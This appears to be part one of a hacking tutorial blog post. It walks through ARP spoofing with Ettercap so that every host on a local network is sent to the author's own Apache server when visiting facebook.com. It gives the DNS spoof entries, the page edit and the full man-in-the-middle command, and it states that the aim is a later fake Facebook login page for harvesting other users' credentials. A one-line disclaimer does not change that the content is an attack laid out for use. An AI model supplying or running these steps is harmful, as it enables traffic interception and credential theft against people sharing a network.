Redirect someone to a different website (ARP spoofing) PART 1

Ok, this time I'am going to show you how to redirect some one to a different website. I will just go through the basic for now, and later one we are going to combine all of the steps in to one "hack attack". 

NOTE: this technique will only work one your local network (cable, wifi).

DON NOT preform this kind of actions on other networks/computers than your own!  

For this attack we are going to preform something called ARP spoofing. ARP spoofing is a technique in which a computer on the local network can "poison" the ARP table of another host causing it to send packets to the wrong destination. 

The image above helps explaining how ARP spoofing works. Now if the victim surfs the internet all the traffic is going through the attackers computer, in that way the attacker can monitor which sites the victim is visiting. The attacker can even sniff password or redirect the victim to another site. 

There are a couple of tools that can be used for this type of attack, but for this tutorial we are going to use "Ettercap" which comes preinstalled on BackTrack/Kali.

And here are the steps:

Step nr 1:

First you need to find out what your IP-address on the local network is. 

Type:

• ifconfig 

Here is a screen shot of what you will see after you have typed in the command above:

Write down the IP for your working internet connection (I'am going to use my cable connection for this tutorial ), we are going to use it in the next step.

Step nr 2:

Now we need to edit etter.dns and add the name of the website which we want the victim to get redirected to (facebook in this case). 

Type:

• nano /etc/ettercap/etter.dns

Now add this tre lines to the bottom of the file:

facebook.com      A    10.0.0.97   

*.facebbok.com    A    10.0.0.97

*.facebook.*      A    10.0.0.97

Just remember to change 10.0.0.97 to your own IP which you wrote down in the first step!

After you are are done, exit and save (hit Ctrl + x and then hit Y and then hit enter)

Step nr 2.5 (Optional):

Since all hosts on our LAN are going to visit our server, you can change what message they will be presented with instead of facebook.

Type:

• nano /var/www/index.html

Just change the HTML content to what ever you want people to see instead, then save and exit. 
Now you need to restart your apache server in order for the changes to take affect. 

Type:

• service apache2 restart

Step nr 3:

Lets start Ettercap end redirect people.

Type:

• ettercap -T -q -M arp -P dns_spoof // // -i eth0

Now try to visit facebook with another computer or what ever you have and see what happens.

Screen shot of what other computers will see when they try to visit facebook:

NOTE: This hack will not work if you try to visit facebook with a smartphone app, you have to use a web browser for this to work.

Here is an explanation for the command above:

T       = text mode

q       =  quit mode

M     =  man in the middle

P      =  plugin

// //   =  specify all host   

The reason to why we redirect all traffic to facbook to our local IP (apache server), is because we later on are going to put up a fake facebook login site and trick other computers on the local network to reveal their credentials.